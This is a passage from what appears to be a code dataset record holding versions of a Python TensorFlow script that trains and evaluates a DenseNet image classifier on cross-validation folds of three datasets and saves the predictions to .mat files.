growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\n<mask token>\n",
"step-4": "def densenet(D, DT, F, model):\n import scipy.io as sio\n import time\n import os\n import math\n import numpy as np\n import matplotlib.pyplot as plt\n Dataset = D\n if DT == 'org':\n data_type = 'original'\n else:\n data_type = 'augmented'\n fs = model.fs\n fm1 = model.fm1\n batch_size = model.batch_size[0]\n learn_rate = model.learn_rate\n num_layers = model.num_layers\n k_fm = model.k_fm\n bottleneck = model.bottleneck\n dropout_prob = model.dropout_prob\n num_of_test = model.num_of_test\n if F == 1:\n file_name = '1st_fold'\n elif F == 2:\n file_name = '2nd_fold'\n elif F == 3:\n file_name = '3rd_fold'\n elif F == 4:\n file_name = '4th_fold'\n elif F == 5:\n file_name = '5th_fold'\n path = os.path.join('CrossVal', 'D' + Dataset)\n print('path ', path)\n if data_type == 'original':\n Train = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' +\n file_name + '_train.mat'))\n else:\n Train = sio.loadmat(os.path.join(path, 'Augmented_D' + Dataset +\n '_' + file_name + '_train.mat'))\n Test = sio.loadmat(os.path.join(path, 'D' + Dataset + '_' + file_name +\n '_test.mat'))\n if Dataset == '1':\n number_of_classes = 24\n num_of_ep = 50\n num_of_test = 20\n if data_type == 'augmented':\n train_imgs = 526190\n else:\n train_imgs = 52619\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n elif Dataset == '2':\n number_of_classes = 36\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 20120\n else:\n train_imgs = 2012\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n else:\n number_of_classes = 10\n num_of_ep = 200\n if data_type == 'augmented':\n train_imgs = 16000\n else:\n train_imgs = 1600\n iteration = math.ceil(num_of_ep * train_imgs / batch_size)\n iteration_to_display = int(iteration / num_of_test)\n list_to_display = []\n for i in range(num_of_test):\n if i != num_of_test:\n list_to_display.append(int(iteration_to_display * (i + 1)))\n del i\n total_fm_Block_1 = fm1 + num_layers * k_fm\n total_fm_Block_2 = total_fm_Block_1 + num_layers * k_fm\n total_fm_Block_3 = total_fm_Block_2 + num_layers * k_fm\n fc_nodes = [total_fm_Block_3]\n Train_Images = Train['trainImages']\n Train_Labels = Train['trainLabels2']\n total_trainImages = len(Train_Images[0, 2])\n print(total_trainImages)\n Train_Images = Train_Images.reshape(784, total_trainImages).transpose(\n ).astype('float32')\n Train_Labels = Train_Labels.transpose().astype('float64')\n Test_Images = Test['testImages']\n Test_Labels = Test['testLabels2']\n total_testImages = len(Test_Images[0, 2])\n Test_Images = Test_Images.reshape(784, total_testImages).transpose(\n ).astype('float32')\n Test_Labels = Test_Labels.transpose().astype('float64')\n Target_labels = np.argmax(Test_Labels, axis=1)\n del Test\n del Train\n import tensorflow as tf\n tf.reset_default_graph()\n g = tf.Graph()\n with g.as_default():\n tf.set_random_seed(1)\n\n def weight_variable(shape, n):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial, name=n)\n\n def bias_variable(shape, n):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial, name=n)\n\n def avg_pool(input, s):\n return tf.nn.avg_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def max_pool(input, s):\n return tf.nn.max_pool(input, [1, s, s, 1], [1, s, s, 1], 'SAME')\n\n def conv2d_1(input, in_features, out_features, kernel_size, name=\n 'W', with_bias=False):\n W = weight_variable([kernel_size, kernel_size, in_features,\n out_features], name)\n conv = tf.nn.conv2d(input, W, [1, 1, 1, 1], padding='SAME')\n if with_bias:\n return conv + bias_variable([out_features])\n return conv\n\n def batch_activ_conv(current, in_features, out_features,\n kernel_size, is_training, keep_prob, idx, scope='conv_block'):\n with tf.variable_scope(scope):\n current = tf.layers.batch_normalization(current, scale=True,\n training=is_training)\n current = tf.nn.relu(current)\n current = conv2d_1(current, in_features, out_features,\n kernel_size, name='W' + str(idx))\n current = tf.nn.dropout(current, keep_prob)\n return current\n\n def block(input, layers, in_features, growth, is_training,\n keep_prob, name='Block_'):\n with tf.name_scope(name):\n with tf.variable_scope(name):\n current = input\n features = in_features\n for idx in range(layers):\n tmp = batch_activ_conv(current, features, growth,\n fs, is_training, keep_prob, idx + 1, scope=\n 'conv_block_' + str(idx + 1))\n current = tf.concat((current, tmp), axis=3)\n features += growth\n return current, features\n x = tf.placeholder(tf.float32, shape=[None, 784])\n y_ = tf.placeholder(tf.float32, shape=[None, number_of_classes])\n x_image = tf.reshape(x, [-1, 28, 28, 1])\n keep_prob = tf.placeholder(tf.float32)\n training = tf.placeholder(tf.bool)\n current = conv2d_1(x_image, 1, fm1, fs, name='W1', with_bias=False)\n current, features = block(current, num_layers, fm1, k_fm, training,\n keep_prob, name='Block_1')\n b1_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_1')\n t1_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_1_1')\n t1_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_2')\n b2_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_2'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_2')\n t2_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_2_1')\n t2_conv_printop = tf.Print(current, [current])\n current = max_pool(current, 2)\n current, features = block(current, num_layers, features, k_fm,\n training, keep_prob, name='Block_3')\n b3_conv_printop = tf.Print(current, [current])\n with tf.name_scope('transition_lyr_3'):\n current = batch_activ_conv(current, features, bottleneck * k_fm,\n 1, training, keep_prob, 1, scope='Transition_layer_3')\n t3_b_conv_printop = tf.Print(current, [current])\n current = batch_activ_conv(current, bottleneck * k_fm, features,\n fs, training, keep_prob, 1, scope='Transition_layer_3_1')\n t3_conv_printop = tf.Print(current, [current])\n current = avg_pool(current, 7)\n current = tf.reshape(current, [tf.shape(current)[0], -1])\n with tf.name_scope('Dense_Last_lyr'):\n W_fc3 = weight_variable([fc_nodes[0], number_of_classes], 'w_fc3')\n b_fc3 = bias_variable([number_of_classes], 'b_fc3')\n y_conv = tf.matmul(current, W_fc3) + b_fc3\n prediction_prob = tf.nn.softmax(y_conv)\n prediction_prob_printop = tf.Print(prediction_prob, [\n prediction_prob])\n with tf.name_scope('Xent'):\n cross_entropy = tf.reduce_mean(tf.nn.\n softmax_cross_entropy_with_logits(labels=y_, logits=y_conv))\n with tf.name_scope('train'):\n extra_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(extra_update_ops):\n train_step = tf.train.AdamOptimizer(learn_rate).minimize(\n cross_entropy)\n with tf.name_scope('accuracy'):\n correct_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(\n y_, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n wrong_prediction = tf.not_equal(tf.argmax(y_conv, 1), tf.argmax\n (y_, 1))\n wrong_prediction_printop = tf.Print(wrong_prediction, [\n wrong_prediction])\n predicted_labels = tf.argmax(y_conv, 1)\n predicted_labels_printop = tf.Print(predicted_labels, [\n predicted_labels])\n index = 0\n index_end = index + batch_size\n remaining = 0\n start_time = time.time()\n costs = []\n accuracy_list = []\n list_of_predicted_list = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer(), tf.set_random_seed(0))\n for i in range(iteration):\n if index_end > total_trainImages:\n remaining = total_trainImages - (index_end - batch_size)\n images = Train_Images[index_end - batch_size:\n total_trainImages, :]\n labels = Train_Labels[index_end - batch_size:\n total_trainImages, :]\n index = 0\n index_end = index + batch_size - remaining\n images = np.vstack((images, Train_Images[index:\n index_end, :]))\n labels = np.vstack((labels, Train_Labels[index:\n index_end, :]))\n batch = images, labels\n index = index_end\n index_end = index + batch_size\n else:\n batch = Train_Images[index:index_end, :], Train_Labels[\n index:index_end, :]\n index = index + batch_size\n index_end = index_end + batch_size\n if i in list_to_display:\n elapsed_time = time.time() - start_time\n print('Elapsed Time Before for loop: %f secs' %\n elapsed_time)\n Accuracy = 0\n itrt_index = i\n print('debug: %d & %d' % (iteration, i))\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(\n 1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(\n 1, number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted, prediction_prob = sess.run([\n wrong_prediction_printop,\n predicted_labels_printop,\n prediction_prob_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = (sess\n .run([b1_conv_printop, b2_conv_printop,\n b3_conv_printop, t1_conv_printop,\n t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image,\n y_: t_label, keep_prob: 1.0, training: False}))\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list_1 = wrong\n predicted_list_1 = predicted\n prediction_prob_1 = prediction_prob\n else:\n wrong_list_1 = np.append(wrong_list_1, wrong,\n axis=0)\n predicted_list_1 = np.append(predicted_list_1,\n predicted, axis=0)\n prediction_prob_1 = np.append(prediction_prob_1,\n prediction_prob)\n Accuracy = Accuracy / num_test\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list_1)\n print('Average test accuracy: %g' % Accuracy)\n epoch_around = math.ceil(itrt_index * batch_size /\n total_trainImages)\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str\n (epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list':\n wrong_list_1, 'predicted_list': predicted_list_1,\n 'Target_labels': Target_labels, 'prediction_prob':\n prediction_prob, 'b1_list': b1_list, 'b2_list':\n b2_list, 'b3_list': b3_list, 't1_list': t1_list,\n 't2_list': t2_list, 't3_list': t3_list, 't1_b_list':\n t1_b_list, 't2_b_list': t2_b_list, 't3_b_list':\n t3_b_list})\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d'\n % (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = itrt_index * batch_size / total_trainImages\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n if i % 100 == 0:\n train_accuracy = accuracy.eval(feed_dict={x: batch[0],\n y_: batch[1], keep_prob: 1.0, training: False})\n print('step %d, training accuracy %g' % (i, train_accuracy)\n )\n _, loss = sess.run([train_step, cross_entropy], feed_dict={\n x: batch[0], y_: batch[1], keep_prob: dropout_prob,\n training: True})\n iteration_cost = 0\n num_minibatches = int(total_trainImages / batch_size)\n iteration_cost += loss / num_minibatches\n costs.append(iteration_cost)\n if i % 100 == 0:\n print('Loss: ', loss)\n Accuracy = 0\n training_time = time.time() - start_time\n print('Training Time: %f secs' % training_time)\n if Dataset == '1':\n if file_name == '5th_fold':\n num_test = 13154\n else:\n num_test = 13155\n elif Dataset == '2':\n num_test = 503\n elif Dataset == '3':\n num_test = 400\n print(num_test)\n for img_index in range(num_test):\n t_image = np.array(Test_Images[img_index, :]).reshape(1, 784)\n t_label = np.array(Test_Labels[img_index, :]).reshape(1,\n number_of_classes)\n test_acc = accuracy.eval(feed_dict={x: t_image, y_: t_label,\n keep_prob: 1.0, training: False})\n Accuracy += test_acc\n wrong, predicted = sess.run([wrong_prediction_printop,\n predicted_labels_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index <= 3:\n b1, b2, b3, t1, t2, t3, t1_b, t2_b, t3_b = sess.run([\n b1_conv_printop, b2_conv_printop, b3_conv_printop,\n t1_conv_printop, t2_conv_printop, t3_conv_printop,\n t1_b_conv_printop, t2_b_conv_printop,\n t3_b_conv_printop], feed_dict={x: t_image, y_:\n t_label, keep_prob: 1.0, training: False})\n if img_index == 0:\n b1_list = b1\n b2_list = b2\n b3_list = b3\n t1_list = t1\n t2_list = t2\n t3_list = t3\n t1_b_list = t1_b\n t2_b_list = t2_b\n t3_b_list = t3_b\n else:\n b1_list = np.append(b1_list, b1, axis=0)\n b2_list = np.append(b2_list, b2, axis=0)\n b3_list = np.append(b3_list, b3, axis=0)\n t1_list = np.append(t1_list, t1, axis=0)\n t2_list = np.append(t2_list, t2, axis=0)\n t3_list = np.append(t3_list, t3, axis=0)\n t1_b_list = np.append(t1_b_list, t1_b, axis=0)\n t2_b_list = np.append(t2_b_list, t2_b, axis=0)\n t3_b_list = np.append(t3_b_list, t3_b, axis=0)\n if img_index == 0:\n wrong_list = wrong\n predicted_list = predicted\n else:\n wrong_list = np.append(wrong_list, wrong, axis=0)\n predicted_list = np.append(predicted_list, predicted,\n axis=0)\n Accuracy = Accuracy / num_test\n print('Average test accuracy: %g' % Accuracy)\n accuracy_list.append(Accuracy)\n list_of_predicted_list.append(predicted_list)\n elapsed_time = time.time() - start_time\n print('Elapsed Time: %f secs' % elapsed_time)\n print(\n 'Batch Size & Iteration & Total Train Imgs : %d & %d & %d' %\n (batch_size, itrt_index, total_trainImages))\n print('learning_rate : %g ' % learn_rate)\n print('1st conv FMaps : %d ' % fm1)\n print('number of layers in dense block : %d ' % num_layers)\n print('growth rate(k_fm) : %d ' % k_fm)\n print('filter size : %d ' % fs)\n print('bottleneck : %d' % bottleneck)\n print('dropout prob : %g ' % dropout_prob)\n print('data_type :', data_type)\n print('file_name :', file_name)\n print('FC nodes : %d' % fc_nodes[0])\n epoch_around = math.ceil(iteration * batch_size / total_trainImages\n )\n if epoch_around == 51:\n epoch_around = 50\n print('Number of epochs : %f ' % epoch_around)\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per tens)')\n plt.title('Learning rate =' + str(learn_rate))\n plt.show()\n sio.savemat('D' + Dataset + '_' + file_name + '_' + str(\n epoch_around) + 'ep_' + data_type +\n '_predicted_labels_list.mat', {'wrong_list': wrong_list,\n 'predicted_list': predicted_list, 'Target_labels':\n Target_labels, 'accuracy_list': accuracy_list,\n 'list_of_predicted_list': list_of_predicted_list, 'costs':\n costs, 'b1_list': b1_list, 'b2_list': b2_list, 'b3_list':\n b3_list, 't1_list': t1_list, 't2_list': t2_list, 't3_list':\n t3_list, 't1_b_list': t1_b_list, 't2_b_list': t2_b_list,\n 't3_b_list': t3_b_list})\n\n\nclass MyModel:\n num_layers = 4\n k_fm = 24\n fs = 3\n fm1 = 32\n bottleneck = 4\n dropout_prob = 0.8\n batch_size = [16]\n learn_rate = 0.001\n num_of_test = 40\n\n\nmodel = MyModel()\ndensenet('1', 'org', 1, model)\ndensenet('1', 'org', 2, model)\ndensenet('1', 'org', 3, model)\ndensenet('1', 'org', 4, model)\ndensenet('1', 'org', 5, model)\ndensenet('1', 'aug', 1, model)\ndensenet('1', 'aug', 2, model)\ndensenet('1', 'aug', 3, model)\ndensenet('1', 'aug', 4, model)\ndensenet('1', 'aug', 5, model)\ndensenet('2', 'org', 1, model)\ndensenet('2', 'org', 2, model)\ndensenet('2', 'org', 3, model)\ndensenet('2', 'org', 4, model)\ndensenet('2', 'org', 5, model)\ndensenet('2', 'aug', 1, model)\ndensenet('2', 'aug', 2, model)\ndensenet('2', 'aug', 3, model)\ndensenet('2', 'aug', 4, model)\ndensenet('2', 'aug', 5, model)\ndensenet('3', 'org', 1, model)\ndensenet('3', 'org', 2, model)\ndensenet('3', 'org', 3, model)\ndensenet('3', 'org', 4, model)\ndensenet('3', 'org', 5, model)\ndensenet('3', 'aug', 1, model)\ndensenet('3', 'aug', 2, model)\ndensenet('3', 'aug', 3, model)\ndensenet('3', 'aug', 4, model)\ndensenet('3', 'aug', 5, model)\n",
